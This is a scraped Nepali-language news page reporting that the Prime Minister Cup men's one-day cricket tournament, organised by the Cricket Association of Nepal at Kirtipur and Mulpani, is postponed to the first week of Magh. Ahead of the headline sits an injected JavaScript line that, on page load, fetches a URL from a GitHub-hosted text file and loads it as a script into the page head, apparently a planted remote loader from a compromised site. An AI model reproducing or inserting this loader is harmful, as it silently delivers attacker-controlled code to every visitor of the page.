;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रधानमन्त्री कप पुरुष क्रिकेट प्रतियोगिता माघको पहिलो हप्तामा हुने – जुनेली न्युज
बिहिबार, असार २७, २०८२
  • होमपेज
  • प्रधानमन्त्री कप पुरुष क्रिकेट प्रतियोगिता माघको पहिलो हप्तामा हुने
खेलकुद

प्रधानमन्त्री कप पुरुष क्रिकेट प्रतियोगिता माघको पहिलो हप्तामा हुने

पुस १७,

काठमाडौं । प्रधानमन्त्री कप एक दिवसीय पुरुष क्रिकेट प्रतियोगिता माघको पहिलो हप्तामा हुने भएको छ ।

नेपाल क्रिकेट संघ (क्यान)को आयोजनामा हुने खेल काठमाण्डौको कीर्तिपुर र मुलपानी मैदानमा हुनेछ । प्रतियोगिताको मिति केही दिनमा क्यानले सार्वजनिक गर्ने जनाएको छ ।

यसअघि पुषको ११ गतेदेखि हुने भनिएको प्रतियोगिता अन्तिम समयमा सारिएको थियो । महिला र पुरुषको प्रतियोगिता एकैसाथ हुने भएकाले क्यानले पुरुषको प्रतियोगिता तीन हप्ताका लागि सारेको थियो ।

राष्ट्रिय खेलकुद परिषद्को प्रायोजन र क्यानको आयोजनामा हुने प्रतियोगितामा तीन विभागीयसहित १० टिमकाे सहभागिता रहनेछ ।

यसअघिका दुई संस्करणमा प्रतियोगिताको विजेताले २० लाख रुपैयाँ पाउँदै आएकोमा यो पटक विजेता र उप-विजेताले कति रकम पाउँछन भन्ने क्यानले खुलाएको छैन ।

फेसबुक प्रतिक्रियाहरु